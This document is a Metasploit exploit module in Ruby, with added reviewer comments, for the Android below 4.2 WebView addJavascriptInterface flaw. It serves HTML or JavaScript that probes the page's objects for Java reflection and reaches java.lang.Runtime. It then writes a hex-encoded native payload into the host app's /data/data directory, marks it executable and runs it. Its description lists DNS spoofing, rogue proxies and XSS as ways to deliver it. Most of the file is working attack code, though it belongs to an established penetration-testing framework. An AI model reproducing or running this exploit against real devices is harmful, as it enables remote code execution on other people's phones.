##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # HTTP server module. It serves either an HTML page or, when the request
  # URI ends in "js", bare JavaScript. The script walks every property of the
  # WebView's `top` object looking for one that exposes Java reflection
  # (the addJavascriptInterface exposure described in 'Description') and
  # uses it to write and run the selected payload. The module does not
  # deliver the content itself; the operator must get it loaded into an
  # affected WebView by other means (see 'Description').
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  # BrowserAutopwn registration. :vuln_test is JavaScript run in the browser:
  # it probes each property of `top` for an object whose getClass() can reach
  # java.lang.Runtime and sets is_vuln on the first hit. #js below uses the
  # same probe shape to pick the object it actually uses.
  autopwn_info({
    :os_flavor => "Android",
    :arch => ARCH_ARMLE,
    :javascript => true,
    :rank => ExcellentRanking,
    :vuln_test => %Q|
      for (i in top) {
        try {
          top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
          is_vuln = true; break;
        } catch(e) {}
      }
    |
  })

  # Module metadata. Platform/Arch are fixed to linux/ARMLE (the payload is a
  # native executable, see #js). 'PrependFork' => true is set as a default
  # option; its effect is applied on the payload side and is not visible here.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Android < 4.2 WebView addJavascriptInterface MITM Code Execution',
      'Description' => %q{
        This module exploits an issue where MITM attackers can execute
        arbitrary code on vulnerable Android devices. The issue is rooted in
        the use of the addJavascriptInterface function, which exposes Java
        Reflection to Javascript executing within a WebView instance. Many
        Android ad network integrations are known to be affected.

        To use this module, the attacker must have some way to inject the html/js
        served by metasploit into an affected Webview on the target device. There
        are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).

        This module can also get a shell on some versions of the Browser app on
        Android < 4.2, where the vendor has added an addJavascriptInterface wrapper.

        Note: Adding a .js to the URL will return plain javascript (no HTML markup).
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'jduck', # original msf module
        'joev' # static server
      ],
      'References' => [
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+
          'addjavascriptinterface-remote-code-execution/']
      ],
      'Platform' => 'linux',
      'Arch' => ARCH_ARMLE,
      'DefaultOptions' => { 'PrependFork' => true },
      'Targets' => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Dec 21 2012',
      'DefaultTarget' => 0
    ))
  end

  # Request handler. A URI ending in "js" gets the raw script from #js with a
  # text/javascript content type; any other URI gets the HTML wrapper from #html.
  #
  # @param cli [Object] the client connection passed through to send_response*
  # @param req [Object] the request; only req.uri is inspected
  #
  # NOTE(review): end_with?('js') matches any URI ending in those two letters
  # (e.g. "/foojs"), not only the ".js" suffix the description mentions.
  def on_request_uri(cli, req)
    if req.uri.end_with?('js')
      print_status("Serving javascript")
      send_response(cli, js, 'Content-type' => 'text/javascript')
    else
      print_status("Serving HTML")
      send_response_html(cli, html)
    end
  end

  # Builds the JavaScript served to the WebView. The string is generated per
  # call: it embeds payload.encoded_exe as an escaped hex string and a random
  # 8-letter file name. In the browser, exec() is tried on every property of
  # `top` and stops at the first one that returns true. For a candidate
  # object it: confirms getClass() works, obtains java.lang.Runtime via
  # reflection, reads /proc/$PPID/cmdline through /system/bin/sh to learn the
  # hosting app's package name (used to build a path under /data/data/),
  # writes the payload there with echo, chmod 700s it and executes it.
  #
  # NOTE(review): the embedded data relies on the device shell's echo
  # expanding the "\x.." escapes when writing the file - confirm.
  #
  # Defender's view: on the device this activity appears as the affected
  # app's process spawning /system/bin/sh, then creating, chmod-ing and
  # executing a new randomly named file inside its own /data/data directory;
  # the root cause is a Java object reachable from untrusted web content.
  #
  # @return [String] JavaScript source
  def js
    %Q|
      function exec(obj) {
        // ensure that the object contains a native interface
        try { obj.getClass().getName(); } catch(e) { return; }
        // get the runtime so we can exec
        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
        // get the process name, which will give us our data path
        var p = m.invoke(null,null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
        var ch, path = '/data/data/';
        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
        path += '/#{Rex::Text.rand_text_alpha(8)}';
        // build the binary, chmod it, and execute it
        m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
        m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
        m.invoke(null,null).exec([path]);
        return true;
      }
      for (i in top) { if (exec(top[i]) === true) break; }
    |
  end

  # Minimal HTML document that inlines #js in a <script> tag.
  #
  # @return [String] HTML source
  def html
    "<!doctype html><html><body><script>#{js}</script></body></html>"
  end
end